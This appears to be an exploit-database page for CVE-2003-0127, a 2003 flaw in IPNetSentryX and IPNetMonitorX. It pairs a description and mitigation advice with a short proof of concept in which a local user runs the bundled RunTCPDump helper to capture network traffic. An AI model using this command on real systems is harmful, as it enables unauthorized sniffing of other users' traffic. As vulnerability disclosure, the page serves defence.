header-logo
Suggest Exploit
vendor:
IPNetSentryX and IPNetMonitorX
by:
Unknown
5.5
CVSS
MEDIUM
Unauthorized Network Reconnaissance
200
CWE
Product Name: IPNetSentryX and IPNetMonitorX
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Related CWE: CVE-2003-0127
CPE: a:ipnetsentryx:ipnetsentryx cpe:/a:ipnetsentryx:ipnetmonitorx
Metasploit:
Other Scripts:
Platforms Tested:
2003

Unauthorized Network Reconnaissance in IPNetSentryX and IPNetMonitorX

Helper applications that are shipped with IPNetSentryX and IPNetMonitorX can be harnessed by a local attacker to provide for unauthorized network reconnaissance. The attacker can run the RunTCPDump utility with specific parameters to capture network traffic and gather sensitive information.

Mitigation:

Update IPNetSentryX and IPNetMonitorX to the latest version available. Restrict access to these helper applications to trusted users only.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8365/info

It has been reported that helper applications that are shipped with IPNetSentryX and IPNetMonitorX may be harnessed by a local attacker to provide for unauthorized network reconnaissance.

bash-2.05a$ id
uid=503(dummy) gid=20(staff) groups=20(staff)
bash-2.05a$ pwd
/Applications/IPNetSentryX.app/Contents/Resources
bash-2.05a$ ./RunTCPDump -i en1 -x -v -s 4096
RunTCPDump: listening on en1
18:02:55.726143 arp who-has 192.168.0.1 tell 192.168.0.1
0001 0800 0604 0001 XXXX XXXX XXXX XXXX
0001 0000 0000 0000 c0a8 0001 0000 0000
0000 0000 0000 0000 0000 0000 0000

Navigation

Suggest Exploit

Services By CQR